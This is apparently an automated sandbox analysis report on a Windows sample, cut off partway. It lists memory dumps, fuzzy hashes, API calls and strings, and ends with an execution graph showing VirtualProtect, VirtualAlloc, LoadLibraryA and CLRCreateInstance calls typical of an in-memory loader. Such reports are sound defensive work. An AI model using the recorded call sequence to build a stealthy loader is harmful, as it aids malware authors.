                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ErrorLast$EnvironmentVariable
                • String ID:
                • API String ID: 2691138088-0
                • Opcode ID: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
                • Instruction ID: 22096ea5f4b867c31d32e40a63491555c965a2d6565c36c0cc4fb3225757ec96
                • Opcode Fuzzy Hash: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
                • Instruction Fuzzy Hash: A881A922600BC186DF359F66D8653AD27A9F785BC8F548176DE1A5BB89CF38C6868300
                APIs
                • TlsGetValue.KERNEL32 ref: 00B7C582
                • TlsGetValue.KERNEL32 ref: 00B7C5D2
                • TlsSetValue.KERNEL32(?,?,00000000,?,00B7C741), ref: 00B7C5E2
                • TlsGetValue.KERNEL32 ref: 00B7C64F
                • TlsGetValue.KERNEL32 ref: 00B7C683
                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,00B7C741), ref: 00B7C693
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: Value
                • String ID:
                • API String ID: 3702945584-0
                • Opcode ID: 99e938f35e75f1123f06c4c3ef08b1909fb78fbdce6a07cae48cacdb26139bc9
                • Instruction ID: 74952ffe8aafaa9258e3eb5070694927ac2a74fe1a106502792f9b4ffac39188
                • Opcode Fuzzy Hash: 99e938f35e75f1123f06c4c3ef08b1909fb78fbdce6a07cae48cacdb26139bc9
                • Instruction Fuzzy Hash: 443146227056504ADE392B169A8133E6AD1E789FD0F4CC4BE9E1D47781DF7CDC418380
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 00BA2D75
                • GetCurrentProcessId.KERNEL32 ref: 00BA2D80
                • GetCurrentThreadId.KERNEL32 ref: 00BA2D88
                • GetTickCount.KERNEL32 ref: 00BA2D90
                • QueryPerformanceCounter.KERNEL32 ref: 00BA2D9E
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                • API String ID: 1445889803-0
                • Opcode ID: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
                • Instruction ID: c04b724e01c2e3471ee28be355b75ac506dda63291af1970bcc6dc09b5c8a7bf
                • Opcode Fuzzy Hash: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
                • Instruction Fuzzy Hash: A411A066B66B1046FB208B25F80432573A0B749BB1F4816759E9D03BA4EB7CC985C300
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID:
                • String ID: }0x$ParseIntError$kindmessageKindErrorCustomerror (os error )
                • API String ID: 0-1900568752
                • Opcode ID: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
                • Instruction ID: 82fdb345e6be50dd4a665007ace7ebe0c92bcd2d0336e7b156f075ac27389151
                • Opcode Fuzzy Hash: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
                • Instruction Fuzzy Hash: 1951E1A2B14AA49AEB148F61D8407E93BF5F345FC8F44816AEF5D1BB04CB34CA96D300
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: abort$CaptureContextExceptionRaiseUnwind
                • String ID:
                • API String ID: 4122134289-0
                • Opcode ID: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
                • Instruction ID: f8aa1b8296a22305ebc72019cc81d855658c06571276e51b15ba5c523c204f22
                • Opcode Fuzzy Hash: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
                • Instruction Fuzzy Hash: F0114872618B8886DB609F69E84039AB7A5F38DBD4F540126EF8D03B58CF78C155CB10
                Strings
                • Unknown pseudo relocation protocol version %d., xrefs: 00BA3648
                • Unknown pseudo relocation bit size %d., xrefs: 00BA3634
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
                • Instruction ID: 28e7a8314a07dc914156886c2282237e7b874d1315a6d57cf2d4fc9c6a88fbc9
                • Opcode Fuzzy Hash: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
                • Instruction Fuzzy Hash: AC710272B18B8486DB10CF69E84079DB7E1FB1AFA8F588215EE1917798EB39C640C700
                APIs
                Strings
                • s [... omitted frame ...], xrefs: 00BA021B
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: CloseFileHandleUnmapView
                • String ID: s [... omitted frame ...]
                • API String ID: 2381555830-3732609013
                • Opcode ID: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
                • Instruction ID: 07b3588bb3fe9af1af9c47bf38aa0aa516458edefd6f0a817b903b4f0ba97db5
                • Opcode Fuzzy Hash: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
                • Instruction Fuzzy Hash: 70516932219B8489EB21DF25E8903ED3BA0F349B98F584166EF4E47B59DF38C585C380
                APIs
                Strings
                • Address %p has no image-section, xrefs: 00BA3160, 00BA3345
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00BA335B
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
                • Instruction ID: e299105e3e91fbf3d23f8f95270738c1ad0570fe796602bf9fab025010e46f7d
                • Opcode Fuzzy Hash: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
                • Instruction Fuzzy Hash: 5B31AF73B0AA4096EF118B1AEC4179977E1FB56FA4F488165EE5D07350DB78CA86C700
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                • Unknown error, xrefs: 00BA30CC
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-3474627141
                • Opcode ID: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
                • Instruction ID: 42222cca69b835e0f435e16c3555a89e46fb3bb07caa769e20165368993e2318
                • Opcode Fuzzy Hash: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
                • Instruction Fuzzy Hash: 56016163918F84C3D6118F1CE8003AA7370FBAEB89F659716EB8C26515DB69D692C700
                APIs
                Strings
                • The result is too small to be represented (UNDERFLOW), xrefs: 00BA30B0
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2187435201
                • Opcode ID: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
                • Instruction ID: 13039195b29780be5c51a30939f0ef2b0a4852633cb8ee2c0557c7d6bd19996b
                • Opcode Fuzzy Hash: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
                • Instruction Fuzzy Hash: BAF03653918E8482D242DF1CA4003AB7370FB9EB98F655716EF8D3A515DF64D5829700
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                • Overflow range error (OVERFLOW), xrefs: 00BA30A0
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4064033741
                • Opcode ID: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
                • Instruction ID: ef5e42d192185747c38a4be7c5c6b60299fbc97da45e0dc256a74c8d6ab5cf83
                • Opcode Fuzzy Hash: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
                • Instruction Fuzzy Hash: FEF03652918E8482D2429F2CA4003AB7370FB9EB98F655716EF8D3A515DF64D5829700
                APIs
                Strings
                • Partial loss of significance (PLOSS), xrefs: 00BA3090
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4283191376
                • Opcode ID: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
                • Instruction ID: 04790cbde7e2917dbc0a679b3f1bbd0813a9a39c58b4fc483a83b46c7fbf30c3
                • Opcode Fuzzy Hash: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
                • Instruction Fuzzy Hash: EBF03652918E8482D2429F1CA8003AB7374FB9EB98F655716EF8D3A515DF64D5829700
                APIs
                Strings
                • Argument domain error (DOMAIN), xrefs: 00BA3080
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2713391170
                • Opcode ID: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
                • Instruction ID: 54356efb24c758b229fb5e780c1fdddf5f87c52a1baf631ce65a7ecfe7ce7d64
                • Opcode Fuzzy Hash: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
                • Instruction Fuzzy Hash: 23F03652918E8482D2429F1CE4003AB7370FB9EB98F655716EF8D3A515DF64D5829700
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                • Total loss of significance (TLOSS), xrefs: 00BA30C0
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4273532761
                • Opcode ID: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
                • Instruction ID: 450b0ab177f89e933fbcb428ef5ca7ce1e23d41825b6f596979249e44216260d
                • Opcode Fuzzy Hash: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
                • Instruction Fuzzy Hash: F3F03652918E8882D3029F1CA8003AB7370FB9EB98F659716EF8D3A515DF64D5C29700
                APIs
                Strings
                • Argument singularity (SIGN), xrefs: 00BA3018
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2468659920
                • Opcode ID: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
                • Instruction ID: fbc6a078bcd1ffaf8d262cf790ff9381d0655cf344d85487ad8fac6df8bcfa64
                • Opcode Fuzzy Hash: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
                • Instruction Fuzzy Hash: ECF03062918E8882D202DF1CA8003AB7370FB9EB99F659716EF8D3A515DF64D5828700

                Execution Graph

                Execution Coverage:11.5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:88
                Total number of Limit Nodes:5
                execution_graph 2423 204fd670173 VirtualProtect 2424 204fd67018b 2423->2424 2431 204fd67012b 2423->2431 2425 204fd670199 VirtualProtect 2424->2425 2432 204fd672a9c 2425->2432 2428 204fd6701dc VirtualProtect 2429 204fd6701f5 2428->2429 2428->2431 2430 204fd670203 VirtualProtect 2429->2430 2430->2431 2433 204fd6701c1 2432->2433 2434 204fd672ad2 2432->2434 2433->2428 2433->2431 2434->2433 2436 204fd670908 2434->2436 2437 204fd670974 2436->2437 2439 204fd67094b 2436->2439 2438 204fd670984 2437->2438 2442 204fd6729b4 2437->2442 2438->2433 2439->2437 2439->2438 2441 204fd672a9c LoadLibraryA 2439->2441 2441->2439 2443 204fd6729d2 2442->2443 2444 204fd672a7d LoadLibraryA 2443->2444 2445 204fd672a85 2443->2445 2444->2445 2445->2438 2446 204fd67119c 2472 204fd672c44 2446->2472 2449 204fd672c44 LoadLibraryA 2450 204fd6711d8 2449->2450 2451 204fd672c44 LoadLibraryA 2450->2451 2452 204fd6711ee 2451->2452 2453 204fd671200 VirtualAlloc 2452->2453 2470 204fd671219 2452->2470 2454 204fd671245 2453->2454 2453->2470 2455 204fd672c44 LoadLibraryA 2454->2455 2454->2470 2458 204fd6712b9 2455->2458 2456 204fd672c44 LoadLibraryA 2457 204fd671310 2456->2457 2457->2456 2460 204fd671350 2457->2460 2457->2470 2458->2457 2459 204fd6729b4 LoadLibraryA 2458->2459 2458->2470 2459->2458 2460->2470 2471 204fd6713d8 2460->2471 2492 204fd670104 2460->2492 2462 204fd6713ae 2465 204fd6713b2 2462->2465 2476 204fd670230 2462->2476 2463 204fd6714e9 2506 204fd6719a8 2463->2506 2464 204fd671499 2464->2470 2485 204fd670f28 2464->2485 2465->2462 2465->2470 2471->2463 2471->2464 2471->2470 2473 204fd672c7b 2472->2473 2474 204fd6711c5 2473->2474 2516 204fd670750 2473->2516 2474->2449 2477 204fd6729b4 LoadLibraryA 2476->2477 2478 204fd67024e 2477->2478 2479 204fd672a9c LoadLibraryA 2478->2479 2480 204fd670263 2479->2480 2481 204fd67026b VirtualProtect 2480->2481 2482 204fd6702ad 2480->2482 2481->2482 2483 204fd670285 2481->2483 2482->2470 2482->2471 2484 204fd670297 VirtualProtect 2483->2484 2484->2482 2486 204fd670f65 CLRCreateInstance 2485->2486 2488 204fd670f7e 2485->2488 2486->2488 2487 204fd67102d 2487->2470 2488->2487 2489 204fd67108b SysAllocString 2488->2489 2490 204fd67105f 2488->2490 2489->2490 2490->2487 2490->2490 2491 204fd671171 SafeArrayDestroy 2490->2491 2491->2487 2493 204fd6729b4 LoadLibraryA 2492->2493 2494 204fd670123 2493->2494 2495 204fd67012b 2494->2495 2496 204fd672a9c LoadLibraryA 2494->2496 2495->2462 2497 204fd67014a 2496->2497 2497->2495 2498 204fd67016d VirtualProtect 2497->2498 2498->2495 2499 204fd67018b 2498->2499 2500 204fd670199 VirtualProtect 2499->2500 2501 204fd672a9c LoadLibraryA 2500->2501 2502 204fd6701c1 2501->2502 2502->2495 2503 204fd6701dc VirtualProtect 2502->2503 2503->2495 2504 204fd6701f5 2503->2504 2505 204fd670203 VirtualProtect 2504->2505 2505->2495 2511 204fd6719fc 2506->2511 2507 204fd671ef8 2515 204fd672230 2507->2515 2520 204fd672758 2507->2520 2508 204fd6729b4 LoadLibraryA 2508->2511 2509 204fd6729b4 LoadLibraryA 2510 204fd671e59 2509->2510 2510->2507 2510->2509 2513 204fd672a9c LoadLibraryA 2510->2513 2511->2508 2511->2510 2512 204fd672a9c LoadLibraryA 2511->2512 2511->2515 2512->2511 2513->2510 2515->2470 2517 204fd670790 2516->2517 2519 204fd670827 2516->2519 2518 204fd670908 LoadLibraryA 2517->2518 2517->2519 2518->2519 2519->2473 2523 204fd672794 2520->2523 2521 204fd672990 2521->2515 2522 204fd672a9c LoadLibraryA 2522->2523 2523->2521 2523->2522

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_00000204FD6601E8 1 Function_00007FFD9B8A0BFA 2 Function_00000204FD675EE6 3 Function_00000204FD6731E4 4 Function_00007FFD9B8A01F0 5 Function_00007FFD9B8A00F2 6 Function_00000204FD673EEC 7 Function_00000204FD6733FA 8 Function_00000204FD672DF8 9 Function_00000204FD6748F4 33 Function_00000204FD6758AD 9->33 10 Function_00000204FD670AF4 11 Function_00000204FD673200 12 Function_00000204FD675ACB 20 Function_00000204FD673BD0 12->20 13 Function_00007FFD9B8A0E15 14 Function_00007FFD9B8A0218 15 Function_00000204FD6758C8 21 Function_00000204FD6758CD 15->21 16 Function_00000204FD6741C7 17 Function_00000204FD6731C4 18 Function_00000204FD6758D2 59 Function_00000204FD675FA0 18->59 19 Function_00007FFD9B8A0210 76 Function_00000204FD673D75 20->76 114 Function_00000204FD675B0E 20->114 22 Function_00000204FD6734CD 22->15 23 Function_00007FFD9B8A000A 24 Function_00000204FD675BD5 25 Function_00000204FD6742D4 26 Function_00000204FD670ED4 27 Function_00000204FD673DE1 28 Function_00000204FD670AE0 29 Function_00000204FD6736AB 30 Function_00000204FD6719A8 30->3 30->11 30->17 41 Function_00000204FD6729B4 30->41 64 Function_00000204FD672A9C 30->64 85 Function_00000204FD670E48 30->85 91 Function_00000204FD672758 30->91 31 Function_00000204FD670AA4 32 